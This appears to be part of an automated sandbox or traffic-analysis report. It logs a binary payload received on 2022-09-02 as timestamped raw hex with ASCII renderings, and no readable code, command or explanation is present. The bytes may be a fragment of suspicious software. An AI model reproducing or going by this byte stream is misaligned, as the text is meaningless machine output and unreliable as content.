                                                                                            Data Ascii: U+8tyfnEMxU+rH+/$<zx,$tU^{y%ysy_/^3vg}jnQK;)g>ze|GEqcSspM'Svbx|G!D=s
                                                                                            2022-09-02 09:02:36 UTC586INData Raw: 56 01 96 0a 4e c4 49 8a 8c 8e 8f 8d cc 47 89 cf 46 8b cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1d f9 45 cd 71 f1 45 c5 0b 30 c4 03 00 00 75 51 e5 28 eb 81 61 e1 80 7a f1 7a 7f f0 0e 56 59 03 db b1 35 f7 57 10 9b 74 08 2e 26 db a9 dd 07 57 10 9d c4 49 8b 4c 7d b9 03 00 00 83 7a fd 76 7e 8f 63 e3 28 e3 37 db a1 21 f2 56 10 ef db a9 2d f7 57 10 80 24 e2 56 10 c8 8e 56 10 10 57 57 10 9a cc 45 20 f2 59 cf 44 80 6d ef c0 28 eb 81 6c ee 82 7a f1 7a c0 4f 0e 56 59 03 db b1 35 f7 57 10 9d c4 49 8a cc 45 20 f2 59 cf 44 89 cc 44 c3 28 eb 8a cf 45 81 6d ec 81 6c ed 81 7a f1 7a fa 75 0e 56 59 03 db b1 35 f7 57 10 80 1a cc 45 20 f2 59 cf 44 89 cc 44 8a cf 45 88 cc 47 c0 28 eb 8a cf 46 82 6d ed 80 6c ec 80 7a f1 07 8d d4 a9 00 00 02 0e 56 59 03 db b1 35 f7 57 10 9d c4 49
                                                                                            Data Ascii: VNIGFDEMVSEqE0uQ(azzVY5Wt.&WIL}zv~c(7!V-W$VVWWE YDm(lzzOVY5WIE YDD(EmlzzuVY5WE YDDEG(FmlzVY5WI
                                                                                            2022-09-02 09:02:36 UTC588INData Raw: b9 63 00 00 00 00 bb f7 c7 27 00 7c 47 d0 9f 4d 2d 3e ec 64 49 61 71 8c 96 f5 21 41 de 45 2b e8 a6 71 8c 96 f5 3a 52 fe 69 eb 74 4d b3 7a 85 80 82 80 48 02 78 f1 bf 6a 51 3a 86 18 f2 93 80 82 80 48 02 78 f1 bf 7c 47 3b 71 fa b2 59 61 9b d7 64 49 61 77 8a 90 23 c0 8e fe 08 fe 69 eb 8a 7a 84 ce 49 66 3a d8 d4 5a f9 a7 b1 91 87 00 00 77 96 f6 fb cb 27 00 95 48 7b d0 81 83 7a 1a 69 09 c7 68 20 52 65 c5 cd f5 b2 62 9d 7a fb 7c 72 8f 7a fa 76 61 b5 ad a1 ad 10 4e 9d 62 ad a1 ad 10 99 84 01 a1 ad 10 4e 9d 2b 34 0b 28 00 a9 00 00 00 00 91 c7 16 16 00 00 e8 85 ba 28 00 7c 47 d0 97 4b 37 a1 9d 0f 00 00 00 00 00 00 00 00 00 00 00 00 47 df 70 28 87 c7 68 20 81 57 a6 1d 5a f3 4a ce 60 2c 8c 44 b5 63 97 7b fa 01 01 00 72 7c 8d be b9 3d b9 10 10 74 71 ec 3f c7 11 00 57
                                                                                            Data Ascii: c'|GM->dIaq!AE+q:RitMzHxjQ:Hx|G;qYadIaw#izIf:Zw'H{zih Rebz|rzvaNbN+4((|GK7Gp(h WZJ`,Dc{r|=tq?W
                                                                                            2022-09-02 09:02:36 UTC589INData Raw: a3 3f 00 a6 07 9d 0f 00 00 99 de 67 ba 65 f3 90 00 00 00 00 00 00 00 db de 59 81 c4 49 8a 88 08 ca b4 7d 8a 41 c3 0e a4 af 20 cf 1a 7a fe 7d 8b 4a 36 72 c4 49 83 42 c0 8b 8c 0c ca b4 7d 8a 45 c7 0e ac a7 20 57 9d 65 4a 42 47 e4 7e 97 0a 0f 00 00 00 00 00 00 00 00 00 47 df 70 20 8f c7 68 2c ff 35 c1 03 00 00 75 49 b7 89 38 3b 74 5b 24 ca b4 52 1c 5b 60 74 50 2f ee 90 69 dc 29 f8 2a 7b 43 77 6c 13 ca b4 65 2b 5b 62 76 65 93 42 c5 87 41 c6 0e ee 91 a7 59 74 cc f3 03 53 8b db 11 31 63 43 c1 c2 34 35 c3 01 00 00 74 6c 92 88 81 41 c3 3b 3b 74 92 64 42 c0 0b ca b4 a8 2b 35 c0 02 00 00 74 d0 c2 ed 89 81 41 c0 38 3b 74 bb c4 ca b4 b2 fc 5b 60 74 b0 cf ee 90 c9 3e 42 c3 e9 63 dd de 67 bd 00 f0 a1 a0 a0 10 23 f6 4c cc b9 5d 01 16 b6 10 43 05 65 e8 e0 f8 94 dc 72 8c
                                                                                            Data Ascii: ?geYI}A z}J6rIB}E WeJBG~Gp h,5uI8;t[$R[`tP/i)*{Cwle+[bveBAYtS1cC45tlA;;tdB+5tA8;t[`t>Bcg#L]Cer
                                                                                            2022-09-02 09:02:36 UTC590INData Raw: 16 00 c4 f8 9a 2d 7d ce c7 dd 00 dd 00 83 43 c8 83 7b 1b e9 31 c5 cd c8 87 35 be 8a 8d ae 01 a8 8a 81 0b 8a 79 f3 8a 7d f7 ea f9 6c 80 10 95 45 b4 56 1b 64 41 4f 00 26 71 57 00 b8 ed f9 8a 69 e3 8a 6d e7 8a 8d ae 05 ac 8a 55 df ea 91 04 80 10 99 cc bd ae be bc ac 07 00 a6 a6 8a 81 1c a3 b3 07 00 74 ce bd a1 b0 b0 58 01 00 39 64 55 81 d4 a9 7d d4 ad 85 7d 83 8d 8d cb 54 9d cc 4d 31 64 7d 55 7d 83 8d 8d cb 44 8d cc 65 df 8a 7d e0 2c cd 09 00 83 7b 07 a6 d0 cc a9 99 72 34 f3 29 c8 20 01 00 3b 7e 65 2f 8b 5f db 00 00 53 00 de c0 59 45 ae 8a 65 40 af 8a 55 c8 08 e9 09 00 83 47 dc 23 f8 4a cc b1 80 a0 5f be dd 68 80 10 43 00 ac 8a 61 44 af 8a 79 f3 8a 7d f7 29 ed f8 4a cc bd 8d 72 34 c5 1f 5e b7 00 00 7e 43 be 7b 18 97 4f bb 43 c8 35 3d 04 04 00 77 61 fe 0c ec
                                                                                            Data Ascii: -}C{15y}lEVdAO&qWimUtX9dU}}TM1d}U}De},{r4) ;~e/_SYEe@UG#J_hCaDy})Jr4^~C{OC5=wa
                                                                                            2022-09-02 09:02:36 UTC592INData Raw: 0a 4e c4 49 8a cc 45 8b cf 44 89 cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1a cc 45 8b cf 44 89 cc 44 8a cf 45 88 cc 47 89 cf 46 8a ce 4d 56 01 96 0a 96 de 67 6f 6f e4 81 f4 81 75 fc 8d 73 fe 79 87 f6 75 83 c6 5d d1 28 ee ec ed 8b 16 9b 00 00 00 66 69 60 69 60 69 60 21 5e 76 69 60 39 76 46 69 60 31 6e 56 69 70 78 61 69 70 30 5f 76 69 70 28 77 46 69 70 20 6f 56 69 60 09 26 26 69 60 01 3e 36 69 60 19 16 06 69 60 11 0e 16 69 70 18 27 26 69 70 10 3f 36 69 70 08 17 06 69 70 00 0f fd 3b 36 80 00 00 8d 32 3f 80 00 00 49 3c d6 28 fe 8d 73 f6 81 77 6e b8 9e 96 de 67 6f 6f f0 95 f4 89 7d fc 8d 71 d4 a1 77 d6 51 87 48 5a 12 43 43 ce 4d 3b f9 e1 e1 49 62 ee 3c f9 e1 e1 53 12 73 cb c9 d1 d1 79 64 e8 3c c9 d1 d1 71 5a da dc a2 3f c1 fe 65 9b 45 4d 62 9e f6 c4 a5 d3 ca 85
                                                                                            Data Ascii: NIEDDEMVSEDDEGFMVgoousyu](fi`i`i`!^vi`9vFi`1nVipxaip0_vip(wFip oVi`&&i`>6i`i`ip'&ip?6ipip;62?I<(swngoo}qwQHZCCM;Ib<Ssyd<qZ?eEMb
                                                                                            2022-09-02 09:02:36 UTC593INData Raw: 9b c6 55 91 cc 9d 53 ce 51 47 da cc 95 5b 8b 56 df cc 99 57 ce 4d 5f 64 cc c4 7e 49 85 c4 81 45 f4 9d 69 f4 a9 db 8b db 5e 01 00 8b be 89 3c 80 10 9d c0 a5 b9 01 af 29 53 45 4b 96 c5 58 80 10 64 2a dd fe 95 e9 74 2d d5 c8 ad b8 af 8a 79 f3 29 53 45 b4 3f c8 fe 95 e9 74 30 ce fe a9 5f 7d 01 38 82 91 d5 01 00 00 75 79 f3 8a ad 30 59 53 1d 00 74 7b a9 1f 7d cc 89 25 da 7f 0e 0f 00 80 08 24 de c9 72 3e 35 3d 04 04 00 77 58 c7 49 5f 01 00 74 4f ff fc b3 4c ff c7 cc 00 cc 00 eb c6 7a 00 a8 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 58 7b cb cc 82 b6 f0 f3 29 38 d1 00 00 50 b8 1f 2a 22 00 c4 fc 9e 2d 7d ce c7 dd 00 dd 00 83 43 c8 81 cc a1 0f e8 8a f4 99 dd 44 99 90 ac 55 89 32 66 07 a8 8a 91 0c 11 13 15 00 7c 47 c8 5a a9 8a 91 1b 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 56
                                                                                            Data Ascii: USQG[VWM_d~IEi^<)SEKXd*t-y)SE?t0_}8uy0YSt{}%$r>5=wXI_tOLz#k},X{)8P*"-}CDU2f|GZ#k},V
                                                                                            2022-09-02 09:02:36 UTC594INData Raw: cb b5 5d a3 c7 68 34 9b cf 60 28 3f e1 25 06 7a 53 53 cf 60 2c ff 06 7a 7b 7b 48 34 93 40 34 9b 43 43 4d 31 93 40 34 13 d2 3a ac cc 43 43 d7 78 34 9b df 70 28 87 cf 60 2c d9 38 38 0a 0a 3b 3b 09 d3 c2 bc 81 03 04 78 7b 07 93 40 30 9f 43 43 cf 60 34 e7 11 e5 d2 a3 7c 35 6f 70 28 7b 7f 7a 7d 34 7f 60 2c 7e 7f 47 65 6f 60 34 0b 4f 70 30 27 e8 f0 6f 60 2c 13 4f 70 28 fb 2d 2d 2f 5b 59 da 8b 41 41 58 58 52 52 43 43 4d 98 9c d2 10 cc 00 00 00 00 00 00 00 00 00 00 47 cf 60 2c 83 c7 68 34 1b c3 43 c7 68 28 79 7c 82 cf 60 20 f3 16 23 d2 10 53 a4 16 6a 53 53 cf 60 2c ff 93 40 30 17 db 53 cf 60 2c ff 16 e2 d0 88 99 d2 10 cc 00 00 00 00 00 00 00 00 00 00 00 41 cf bd a4 98 4e 29 80 24 00 00 00 8d e9 40 24 33 f3 4a ce 60 2c 5b d8 53 19 21 e8 83 df 70 2c ff 35 c1 03 00
                                                                                            Data Ascii: ]h4`(?%zSS`,z{{H4@4CCM1@4:CCx4p(`,88;;x{@0CC`4|5op({z}4`,~Geo`4Op0'o`,Op(--/[YAAXXRRCCMG`,h4Ch(y|` #SjSS`,@0S`,AN)$@$3J`,[S!p,5
                                                                                            2022-09-02 09:02:36 UTC596INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            2022-09-02 09:02:36 UTC597INData Raw: b6 2e 98 00 d0 48 98 00 de 46 98 00 ec 74 98 00 fa 62 98 00 14 8d 99 00 24 bd 99 00 3a a3 99 00 54 cd 99 00 60 f9 99 00 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e3 34 10 da 89 43 10 af d3 6c 10 dc be 72 10 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 b5 ad 10 60 dd ad 10 53 2c 1d 37 3d 11 1d 24 22 1d 0c 06 16 00 73 00 6d 1e 10 0c 1d 17 00 4b 4a 08 00 6c 45 2b 0d 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 4b 0e 17 1c 0b 09 7f 01 1c 6a 08 00 4c 00 00 00 44 21 06 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 46 2a 1f 35 34 17 00
                                                                                            Data Ascii: .HFtb$:T`x9%QKGwe*<N`p4Clr`S,7=$"smKJlE+5?rKjLD!5?rF*54
                                                                                            2022-09-02 09:02:36 UTC598INData Raw: 44 05 15 15 6c 07 0a 0d 07 5e 3c 01 1a 53 41 11 00 1c 05 0a 02 15 1d 06 01 4e 48 09 12 53 52 17 14 04 10 16 07 11 01 44 54 1c 0d 45 72 27 1b 1a 1d 04 08 45 54 1b 4f 54 11 17 1f 04 07 0f 15 11 45 49 1d 54 49 07 4e 41 0f 4e 55 1b 1b 06 06 14 0d 4c 57 16 18 57 24 5a 3c 09 04 12 16 45 43 0c 01 1a 15 02 17 54 54 1c 0d 45 41 11 00 1c 05 0a 02 15 1d 06 01 49 54 53 53 06 05 00 1f 1d 06 54 54 11 04 0c 4d 46 09 1d 52 4d 02 1d 17 45 49 07 08 09 1d 1f 0c 15 1d 06 01 40 23 07 0a 00 00 52 64 06 00 09 34 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 45 0b 18 1f 1b 1d 01 03 08 0b 1a 79 07 0a 52 64 06 00 08 35 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 41 13 15 12 18 08 0b 1a 07 7e 07 0a 00 00 52 64 06 00 02 3f 07 27
                                                                                            Data Ascii: Dl^<SANHSRDTEr'ETOTEITINANULWW$Z<ECTTEAITSSTTMFRMEI@#Rd4'NTEHSEFREyRd5'NTEHSEFRA~Rd?'
                                                                                            2022-09-02 09:02:36 UTC600INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 28 28 28 28 28 28 28 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 48 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 10 10 10 10 10 10 10 10 10 10 10 10 10 10 81 80 80 80 80 80 80 80 80 80 80 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: hh(((((((( HH
                                                                                            2022-09-02 09:02:36 UTC601INData Raw: 01 07 01 03 01 b7 00 72 57 00 57 49 00 73 00 00 00 64 00 00 00 48 0c 6d 00 00 00 6d 44 00 48 0c 59 00 00 00 79 4d 00 62 4b 00 4b 56 00 79 00 00 00 50 1d 4d 00 41 0c 4d 00 44 21 06 06 08 0f 07 17 72 00 00 00 4e 21 19 13 08 0f 07 17 72 00 00 00 4f 2c 17 1b 0d 07 17 72 53 36 15 04 11 08 0f 07 17 72 00 00 41 34 12 12 06 07 74 00 4a 3f 19 15 79 00 00 00 4a 3f 1b 0b 65 00 00 00 41 31 02 1b 05 6c 00 00 4d 2c 13 11 0b 68 00 00 46 23 07 10 07 14 13 0b 79 00 00 00 4a 2b 0f 1b 14 13 0b 79 44 21 06 63 4e 21 19 76 4f 2c 17 74 53 36 15 70 41 34 12 67 4a 3f 19 6c 4a 3f 1b 6e 4d 2c 18 79 41 31 02 72 4d 2c 13 72 46 23 07 62 4a 2b 0f 6e 53 32 15 01 07 16 05 18 79 00 00 00 46 34 1b 0d 05 18 79 00 54 3c 1d 07 01 17 05 18 79 00 00 00 57 32 01 0a 0b 16 17 05 18 79 00 00 54 21
                                                                                            Data Ascii: rWWIsdHmmDHYyMbKKVyPMAMD!rN!rO,rS6rA4tJ?yJ?eA1lM,hF#yJ+yD!cN!vO,tS6pA4gJ?lJ?nM,yA1rM,rF#bJ+nS2yF4yT<yW2yT!
                                                                                            2022-09-02 09:02:36 UTC602INData Raw: 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 55 57 4e 23 0e 05 28 25 0b 10 13 13 0b 2e 57 00 a0 a1 46 22 11 24 22 1d 0c 22 25 00 16 17 16 00 73 00 4b 0e 17 1c 0b 09 7f 01 1c 4a 08 00 6c 00 46 47 46 22 11 37 36 07 00 17 0b 1a 20 3c 1a 17 04 05 2d 2d 64 00 10 11 46 22 11 37 2c 02 00 0c 0f 0a 28 25 07 0b 24 41 16 14 4a 2d 04 11 36 34 17 00 65 00 e9 e8 46 22 11 22 33 17 01 1a 06 01 2b 3d 39 41 10 12 4a 2d 04 11 31 2d 00 03 0c 63 a3 a2 46 22 11 24 22 1d 0c 06 16 00 3b 2d 04 11 70 00 5e 5d 57 31 17 1f 04 07 0f 15 11 35 22 1d 0c 06 16 00 73 00 42 43 46 22 11 37 36 07 00 17 0b 1a 24 22 1d 0c 06 16 00 73 6e
                                                                                            Data Ascii: x9%QKGwe*<N`pUWN#(%.WF"$""%sKJlFGF"76 <--dF"7,(%$AJ-64eF""3+=9AJ-1-cF"$";-p^]W15"sBCF"76$"sn
                                                                                            2022-09-02 09:02:36 UTC604INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            2022-09-02 09:02:36 UTC605INData Raw: 00 00 92 92 00 c0 c8 08 00 00 00 00 00 00 93 93 00 c0 c8 08 00 00 00 00 00 00 03 03 00 00 07 07 00 00 78 78 00 00 0a 0a 00 00 02 02 00 00 d8 5e 86 10 18 08 00 00 ac 2a 86 10 19 09 00 00 80 06 86 10 1a 0a 00 00 e8 6d 85 10 00 10 00 00 bc 39 85 10 01 11 00 00 8c 09 85 10 02 12 00 00 68 ed 85 10 03 13 00 00 3c b9 85 10 08 18 00 00 04 81 85 10 09 19 00 00 dc 58 84 10 0a 1a 00 00 a4 20 84 10 0b 1b 00 00 6c e8 84 10 0c 1c 00 00 44 c0 84 10 0e 1e 00 00 24 a0 84 10 0f 1f 00 00 c0 43 83 10 30 20 00 00 88 0b 83 10 31 21 00 00 90 12 82 10 32 22 00 00 f0 71 81 10 68 78 00 00 e0 61 81 10 69 79 00 00 d0 51 81 10 6a 7a 00 00 c0 41 81 10 ec fc 00 00 bc 3d 81 10 ef ff 00 00 ac 2d 81 10 10 00 00 00 01 01 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
                                                                                            Data Ascii: xx^*m9h<X lD$C0 1!2"qhxaiyQjzA=-
                                                                                            2022-09-02 09:02:36 UTC606INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 7a 00 00 00 00 00 41 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: azAZ
                                                                                            2022-09-02 09:02:36 UTC608INData Raw: 5f 8b ab 10 ee 01 00 00 fe 01 00 00 2e 2e 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 96 8a 19 00 00 00 00 00 00 00 00 00 00 00 80 f0 70 00 01 01 00 00 f0 01 0e 00 ff 00 00 00 50 03 07 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 14 10 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3b ab 10 c0 7b ab 10 ef 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 e1 1e 00 00 3b 3b 00 00 5a 5a 00 00 78 78 00 00 97 97 00 00 b5 b5 00 00 d4 d4 00
                                                                                            Data Ascii: _.. %pPTPT;{;;ZZxx
                                                                                            2022-09-02 09:02:36 UTC609INData Raw: 04 00 00 00 00 01 01 09 0d 04 00 d8 d8 00 00 e8 28 c0 00 a8 8d 25 00 00 00 00 00 00 00 00 00 90 76 e6 00 14 14 00 00 00 00 00 00 00 00 00 00 a4 42 e6 00 56 56 00 00 e4 e0 04 00 00 00 00 00 28 28 00 00 30 30 00 00 60 60 00 00 01 01 20 20 00 00 00 00 80 a5 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 0d 0d 00 00 1c 1c 00 00 1c 1c 00 00 12 12 00 00 07 07 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 00 00 0a 0a 00 00 12 12 00 00 14 14 00 00 10 10 00 00 08
                                                                                            Data Ascii: (%vBVV((00`` %
                                                                                            2022-09-02 09:02:36 UTC610INData Raw: e3 00 e3 00 e3 00 e0 00 eb 0b d5 00 ed 38 e5 00 e5 00 e6 00 e6 00 e6 00 e6 00 e7 00 e7 00 e8 00 e8 00 db 00 f7 2c e9 00 e9 00 ea 00 ea 00 ea 00 ea 00 c3 00 b9 7a dc 00 00 f2 d1 00 00 88 88 00 00 3c 3c 00 00 0a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 90 29 00 00 29 29 00 00 29 29 00 00 29 29 00 00 29 1f 00 00 1f 00 00 00 00 0c 09 04 01 36 21 12 05 3c 25 1c 05 43 5f 1a 06 49 56 18 07 50 72 25 07 57 72 2d 08 5d 7a 2f 08 64 4e 23 09 57 72 2d 08 47 59 18 06 2d 3e 17 04 10 17 06 01 43 00 00 43 be 00 c4 7a da 00 da 00 db 00 db 00 da 00 d1 0b ba 00 2b 91 a6 00 00 a6 ce 00 8d 43 de 00 de 00 df 00 df 00 df 00 df 00 c4 00 ab 6f a6 00 00 a6 d0 00 93 43 e2 00 e2 00 e3 00 e3 00 e0 00 eb 0b bb 00 24 9b f5 00 00 ba b4
                                                                                            Data Ascii: 8,z<<o))))))))6!<%C_IVPr%Wr-]z/dN#Wr-GY->CCz+CoC$
                                                                                            2022-09-02 09:02:36 UTC612INData Raw: 14 14 00 00 14 1e 00 00 1e 94 00 00 94 b4 00 f7 43 b6 00 b6 00 b7 00 b7 00 b7 00 b7 00 b8 00 b8 00 b7 00 9b 2c cf 00 00 ff cf 00 00 4e 4e 00 00 0f 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 00 00 8d 69 00 00 69 a9 00 00 a9 72 00 00 72 69 00 00 69 18 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 0c 06 02 25 34 17 06 3d 26 13 08 5f 76 23 0a 83 b4 3b 0c 8a b0 37 0d 8e b2 31 0d a7 2a f3 7e 89 00 a8 21 83 00 83 00 85 00 85 00 87 00 87 00 a6 00 c9 6f 75 00 00 75 10 00 00 10 10 00 00 10 10 00 00 10 1a 00 00 1a 10 00 00 10 10 00 00 10 1a 00 00 1a 93 00 00 93 ae 00 ed 43 a8 00 a8 00 a9 00 a9 00 ad 00 ad 00 b0 00 e9 59 dd 00 00 96 b4 00 00 3b 3b 00 00 07 07 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: C,NNriirrii%4=&_v#;71*~!ouuCY;;
                                                                                            2022-09-02 09:02:36 UTC613INData Raw: f7 00 00 2f 39 00 00 0b 0b 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 75 44 3a 0b 75 44 3a 0b 75 44 3a 0b 5d 77 24 0e 12 00 00 12 0a 00 00 0a 0c 00 00 0c 0e 00 00 0e 10 00 00 10 12 00 00 12 14 00 00 14 16 00 00 16 18 00 00 18 1a 00 00 1a 1c 00 00 1c 1e 00 00 1e 21 00 00 21 23 00 00 23 25 00 00 25 27 00 00 27 29 00 00 29 2b 00 00 2b 3e 00 00 3e 81 00 00 81 8e 00 0b 85 56 00 15 43 28 00 23 0b 20 00 20 00 20 00 20 00 22 00 22 00 3f 00 1e 21 64 00 2a 4e a2 00 3e 96 b5 00 00 da 9a 00 00 19 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 70 5f 25 0a 70 5f 25 0a 70 5f 25
                                                                                            Data Ascii: /9tuD:uD:uD:]w$!!##%%''))++>>VC(# ""?!d*N>tp_%p_%p_%
                                                                                            2022-09-02 09:02:36 UTC617INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 43 00 00 ea 22 00 00 70 9c 00 00 9c a4 22 f2 74 95 c7 7e 2c 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8a b0 37 0d 84 bc 34 0c 7d 48 3e 0b 77 45 39 0b 70 5f 25 0a 69 45 26 0a 63 49 23 09 5c 7b 2f 08 56 72 2c 08 50 72 25 07 48 57 18 07 42 5e 1a 06 3c 25 1c 05 35 23 13 05 2f 3b 10 04 28 39 15 04 21 2f 0d 03 8d 04 0f 86 a0 31 19 88 67 4b 25 09 60 49 20 09 59 7f 2e 08 52 71 2b 08 4b 6b 27 07 45 58 1b 06 3d 27 1c 06 37 20 12 05 30 24 10 04 a4 05 3e 99 e9 00 00 89 99 00 00 4c 4c 00 00 13 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 65 6e 00 00 bd b7 00 00 fa e6 22 f2 74 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d
                                                                                            Data Ascii: C"p"t~,11174}H>wE9p_%iE&cI#\{/Vr,Pr%HWB^<%5#/;(9!/1gK%`I Y.Rq+Kk'EX='7 0$>LLFen"t11111
